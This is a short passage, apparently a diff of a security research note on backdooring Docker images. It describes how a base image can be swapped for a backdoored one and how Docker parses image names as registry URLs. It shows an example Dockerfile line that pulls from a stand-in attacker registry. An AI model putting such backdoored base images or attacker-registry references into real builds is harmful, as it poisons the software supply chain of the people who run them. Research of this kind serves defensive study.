echothrust/howtos/RESEARCH/Research on docker backdooring.md

 Although the image started with `FROM debian` it will end up running whatever `FROM backdoor` image has.

 #### Image with URL as part of name
+_NOTE_: This needs further clarifications, particularly under what conditions docker will actualy fetch the image.

 One of the things that `docker` will do for you is to parse as URL the image name.
 This means that the following statement is valid
 ```Dockerfile
 FROM badregistry.attacker.io/repo/backdoor:latest